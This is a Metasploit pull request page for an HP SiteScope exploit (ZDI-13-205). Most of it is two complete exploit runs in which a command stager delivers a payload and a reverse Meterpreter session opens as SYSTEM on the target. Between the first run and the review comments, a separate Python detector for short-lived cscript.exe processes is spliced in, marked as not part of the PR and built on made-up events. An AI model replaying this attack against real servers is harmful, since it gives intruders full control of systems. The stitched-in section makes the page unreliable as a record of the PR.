
Exploit for ZDI-13-205 #2327

Merged
merged 8 commits into from Sep 9, 2013

Conversation

jvazquez-r7
Contributor

Tested successfully on HP SiteScope 11.20 with Operations Agent on Windows 2003 SP2.

Important: The vulnerable component is installed with Operations Agent (optional!) so it needs to be included! (Check the option while installing).

The vulnerable component is a script which is Windows specific and called from the Java Web Service. So as far as I can say it is Windows specific. Did an HP SiteScope Linux install but looks like the HP Operations isn't included with the installation packages (installation error). From the Java code, looks like it is probably Windows specific (and yup, it isn't a vulnerability on the Java code really).

The exploit, in order to speed up (and work more reliably), is killing cscript processes on every command executed by the CMD Stager. Not a big deal, but the exploitation could kill legit cscript processes running on the target machine... so I've included it with ManualRanking. Let me know if you think another Ranking applies here.

Read source comment for some extra details :)

Test result:

msf exploit(hp_sitescope_runomagentcommand) > set RHOST 192.168.172.136
RHOST => 192.168.172.136
msf exploit(hp_sitescope_runomagentcommand) > check
[*] The target service is running, but could not be validated.
msf exploit(hp_sitescope_runomagentcommand) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Delivering payload...
[*] Command Stager progress -   1.44% done (1499/103903 bytes)
[*] Command Stager progress -   2.89% done (2998/103903 bytes)
[*] Command Stager progress -   4.33% done (4497/103903 bytes)
[*] Command Stager progress -   5.77% done (5996/103903 bytes)
[*] Command Stager progress -   7.21% done (7495/103903 bytes)
[*] Command Stager progress -   8.66% done (8994/103903 bytes)
[*] Command Stager progress -  10.10% done (10493/103903 bytes)
[*] Command Stager progress -  11.54% done (11992/103903 bytes)
[*] Command Stager progress -  12.98% done (13491/103903 bytes)
[*] Command Stager progress -  14.43% done (14990/103903 bytes)
[*] Command Stager progress -  15.87% done (16489/103903 bytes)
[*] Command Stager progress -  17.31% done (17988/103903 bytes)
[*] Command Stager progress -  18.75% done (19487/103903 bytes)
[*] Command Stager progress -  20.20% done (20986/103903 bytes)
[*] Command Stager progress -  21.64% done (22485/103903 bytes)
[*] Command Stager progress -  23.08% done (23984/103903 bytes)
[*] Command Stager progress -  24.53% done (25483/103903 bytes)
[*] Command Stager progress -  25.97% done (26982/103903 bytes)
[*] Command Stager progress -  27.41% done (28481/103903 bytes)
[*] Command Stager progress -  28.85% done (29980/103903 bytes)
[*] Command Stager progress -  30.30% done (31479/103903 bytes)
[*] Command Stager progress -  31.74% done (32978/103903 bytes)
[*] Command Stager progress -  33.18% done (34477/103903 bytes)
[*] Command Stager progress -  34.62% done (35976/103903 bytes)
[*] Command Stager progress -  36.07% done (37475/103903 bytes)
[*] Command Stager progress -  37.51% done (38974/103903 bytes)
[*] Command Stager progress -  38.95% done (40473/103903 bytes)
[*] Command Stager progress -  40.40% done (41972/103903 bytes)
[*] Command Stager progress -  41.84% done (43471/103903 bytes)
[*] Command Stager progress -  43.28% done (44970/103903 bytes)
[*] Command Stager progress -  44.72% done (46469/103903 bytes)
[*] Command Stager progress -  46.17% done (47968/103903 bytes)
[*] Command Stager progress -  47.61% done (49467/103903 bytes)
[*] Command Stager progress -  49.05% done (50966/103903 bytes)
[*] Command Stager progress -  50.49% done (52465/103903 bytes)
[*] Command Stager progress -  51.94% done (53964/103903 bytes)
[*] Command Stager progress -  53.38% done (55463/103903 bytes)
[*] Command Stager progress -  54.82% done (56962/103903 bytes)
[*] Command Stager progress -  56.26% done (58461/103903 bytes)
[*] Command Stager progress -  57.71% done (59960/103903 bytes)
[*] Command Stager progress -  59.15% done (61459/103903 bytes)
[*] Command Stager progress -  60.59% done (62958/103903 bytes)
[*] Command Stager progress -  62.04% done (64457/103903 bytes)
[*] Command Stager progress -  63.48% done (65956/103903 bytes)
[*] Command Stager progress -  64.92% done (67455/103903 bytes)
[*] Command Stager progress -  66.36% done (68954/103903 bytes)
[*] Command Stager progress -  67.81% done (70453/103903 bytes)
[*] Command Stager progress -  69.25% done (71952/103903 bytes)
[*] Command Stager progress -  70.69% done (73451/103903 bytes)
[*] Command Stager progress -  72.13% done (74950/103903 bytes)
[*] Command Stager progress -  73.58% done (76449/103903 bytes)
[*] Command Stager progress -  75.02% done (77948/103903 bytes)
[*] Command Stager progress -  76.46% done (79447/103903 bytes)
[*] Command Stager progress -  77.91% done (80946/103903 bytes)
[*] Command Stager progress -  79.35% done (82445/103903 bytes)
[*] Command Stager progress -  80.79% done (83944/103903 bytes)
[*] Command Stager progress -  82.23% done (85443/103903 bytes)
[*] Command Stager progress -  83.68% done (86942/103903 bytes)
[*] Command Stager progress -  85.12% done (88441/103903 bytes)
[*] Command Stager progress -  86.56% done (89940/103903 bytes)
[*] Command Stager progress -  88.00% done (91439/103903 bytes)
[*] Command Stager progress -  89.45% done (92938/103903 bytes)
[*] Command Stager progress -  90.89% done (94437/103903 bytes)
[*] Command Stager progress -  92.33% done (95936/103903 bytes)
[*] Command Stager progress -  93.77% done (97435/103903 bytes)
[*] Command Stager progress -  95.22% done (98934/103903 bytes)
[*] Command Stager progress -  96.55% done (100320/103903 bytes)
[*] Command Stager progress -  97.98% done (101805/103903 bytes)
[*] Command Stager progress -  99.42% done (103296/103903 bytes)
[*] Sending stage (752128 bytes) to 192.168.172.136
[*] Command Stager progress - 100.00% done (103903/103903 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:4775) at 2013-09-04 15:53:14 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
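Added example, not code from the PR or from the Metasploit module: a small detector for the side effect the author describes above, a burst of cscript.exe processes started and killed in quick succession while the command stager runs. The event layout and the sample events are constructed; real process-creation telemetry would need its own parser, and the window, lifetime and threshold values are assumptions to tune per environment.

```python
from collections import deque
from datetime import datetime, timedelta

# Constructed sample (not real telemetry); layout is an assumption:
# "<ISO timestamp> <start|stop> pid=<n> image=<exe>". pid 1500 is a long-lived
# legitimate cscript.exe; pids 2210-2222 show the one-command-then-kill pattern.
SAMPLE_EVENTS = """\
2013-09-04T15:52:10 start pid=1500 image=cscript.exe
2013-09-04T15:52:58 start pid=2210 image=cscript.exe
2013-09-04T15:52:58 stop pid=2210 image=cscript.exe
2013-09-04T15:52:59 start pid=2214 image=cscript.exe
2013-09-04T15:52:59 stop pid=2214 image=cscript.exe
2013-09-04T15:53:00 start pid=2218 image=cscript.exe
2013-09-04T15:53:00 stop pid=2218 image=cscript.exe
2013-09-04T15:53:01 start pid=2222 image=cscript.exe
2013-09-04T15:53:01 stop pid=2222 image=cscript.exe
2013-09-04T15:53:05 stop pid=1500 image=cscript.exe
"""

def parse_events(text):
    """Yield (timestamp, action, pid, image) tuples from the event text."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, action, pid, image = line.split()
        yield (datetime.fromisoformat(ts), action,
               int(pid.split("=", 1)[1]), image.split("=", 1)[1].lower())

def short_lived_cscript_stops(events, max_life=timedelta(seconds=2)):
    """Return stop timestamps of cscript.exe processes that lived <= max_life."""
    started, stops = {}, []
    for ts, action, pid, image in events:
        if image != "cscript.exe":
            continue
        if action == "start":
            started[pid] = ts
        elif action == "stop" and pid in started and ts - started.pop(pid) <= max_life:
            stops.append(ts)  # killed almost as soon as it was spawned
    return stops

def detect_cscript_churn(events, window=timedelta(seconds=10), threshold=4):
    """Return (window_start, count) alerts when >= threshold short-lived cscript.exe kills fall in one sliding window."""
    recent, alerts = deque(), []
    for ts in short_lived_cscript_stops(events):
        recent.append(ts)
        while ts - recent[0] > window:
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append((recent[0], len(recent)))
    return alerts
```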


def check

data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" "
Contributor

This is the same XML as in exploit except for the key, value and in1 values? Don't need to duplicate it :)

@jvazquez-r7
Contributor Author

Avoiding duplicate code.... hands on

@jvazquez-r7
Contributor Author

Doing a new test, after changes, to ensure I haven't broken anything... :s

@jvazquez-r7
Contributor Author

Test result after fixing my own break...

msf exploit(hp_sitescope_runomagentcommand) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Delivering payload...
[*] Command Stager progress -   1.44% done (1499/103951 bytes)
[*] Command Stager progress -   2.88% done (2998/103951 bytes)
[*] Command Stager progress -   4.33% done (4497/103951 bytes)
[*] Command Stager progress -   5.77% done (5996/103951 bytes)
[*] Command Stager progress -   7.21% done (7495/103951 bytes)
[*] Command Stager progress -   8.65% done (8994/103951 bytes)
[*] Command Stager progress -  10.09% done (10493/103951 bytes)
[*] Command Stager progress -  11.54% done (11992/103951 bytes)
[*] Command Stager progress -  12.98% done (13491/103951 bytes)
[*] Command Stager progress -  14.42% done (14990/103951 bytes)
[*] Command Stager progress -  15.86% done (16489/103951 bytes)
[*] Command Stager progress -  17.30% done (17988/103951 bytes)
[*] Command Stager progress -  18.75% done (19487/103951 bytes)
[*] Command Stager progress -  20.19% done (20986/103951 bytes)
[*] Command Stager progress -  21.63% done (22485/103951 bytes)
[*] Command Stager progress -  23.07% done (23984/103951 bytes)
[*] Command Stager progress -  24.51% done (25483/103951 bytes)
[*] Command Stager progress -  25.96% done (26982/103951 bytes)
[*] Command Stager progress -  27.40% done (28481/103951 bytes)
[*] Command Stager progress -  28.84% done (29980/103951 bytes)
[*] Command Stager progress -  30.28% done (31479/103951 bytes)
[*] Command Stager progress -  31.72% done (32978/103951 bytes)
[*] Command Stager progress -  33.17% done (34477/103951 bytes)
[*] Command Stager progress -  34.61% done (35976/103951 bytes)
[*] Command Stager progress -  36.05% done (37475/103951 bytes)
[*] Command Stager progress -  37.49% done (38974/103951 bytes)
[*] Command Stager progress -  38.93% done (40473/103951 bytes)
[*] Command Stager progress -  40.38% done (41972/103951 bytes)
[*] Command Stager progress -  41.82% done (43471/103951 bytes)
[*] Command Stager progress -  43.26% done (44970/103951 bytes)
[*] Command Stager progress -  44.70% done (46469/103951 bytes)
[*] Command Stager progress -  46.14% done (47968/103951 bytes)
[*] Command Stager progress -  47.59% done (49467/103951 bytes)
[*] Command Stager progress -  49.03% done (50966/103951 bytes)
[*] Command Stager progress -  50.47% done (52465/103951 bytes)
[*] Command Stager progress -  51.91% done (53964/103951 bytes)
[*] Command Stager progress -  53.35% done (55463/103951 bytes)
[*] Command Stager progress -  54.80% done (56962/103951 bytes)
[*] Command Stager progress -  56.24% done (58461/103951 bytes)
[*] Command Stager progress -  57.68% done (59960/103951 bytes)
[*] Command Stager progress -  59.12% done (61459/103951 bytes)
[*] Command Stager progress -  60.57% done (62958/103951 bytes)
[*] Command Stager progress -  62.01% done (64457/103951 bytes)
[*] Command Stager progress -  63.45% done (65956/103951 bytes)
[*] Command Stager progress -  64.89% done (67455/103951 bytes)
[*] Command Stager progress -  66.33% done (68954/103951 bytes)
[*] Command Stager progress -  67.78% done (70453/103951 bytes)
[*] Command Stager progress -  69.22% done (71952/103951 bytes)
[*] Command Stager progress -  70.66% done (73451/103951 bytes)
[*] Command Stager progress -  72.10% done (74950/103951 bytes)
[*] Command Stager progress -  73.54% done (76449/103951 bytes)
[*] Command Stager progress -  74.99% done (77948/103951 bytes)
[*] Command Stager progress -  76.43% done (79447/103951 bytes)
[*] Command Stager progress -  77.87% done (80946/103951 bytes)
[*] Command Stager progress -  79.31% done (82445/103951 bytes)
[*] Command Stager progress -  80.75% done (83944/103951 bytes)
[*] Command Stager progress -  82.20% done (85443/103951 bytes)
[*] Command Stager progress -  83.64% done (86942/103951 bytes)
[*] Command Stager progress -  85.08% done (88441/103951 bytes)
[*] Command Stager progress -  86.52% done (89940/103951 bytes)
[*] Command Stager progress -  87.96% done (91439/103951 bytes)
[*] Command Stager progress -  89.41% done (92938/103951 bytes)
[*] Command Stager progress -  90.85% done (94437/103951 bytes)
[*] Command Stager progress -  92.29% done (95936/103951 bytes)
[*] Command Stager progress -  93.73% done (97435/103951 bytes)
[*] Command Stager progress -  95.17% done (98934/103951 bytes)
[*] Command Stager progress -  96.51% done (100322/103951 bytes)
[*] Command Stager progress -  97.94% done (101807/103951 bytes)
[*] Command Stager progress -  99.37% done (103298/103951 bytes)
[*] Sending stage (752128 bytes) to 192.168.172.136
[*] Command Stager progress - 100.00% done (103951/103951 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1421) at 2013-09-05 08:38:22 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

check:

msf exploit(hp_sitescope_runomagentcommand) > check
[*] The target service is running, but could not be validated.

wchen-r7 added a commit that referenced this pull request Sep 9, 2013
@wchen-r7 wchen-r7 merged commit 7d4bf0c into rapid7:master Sep 9, 2013
@jvazquez-r7 jvazquez-r7 deleted the zdi_13_205 branch November 18, 2014 15:59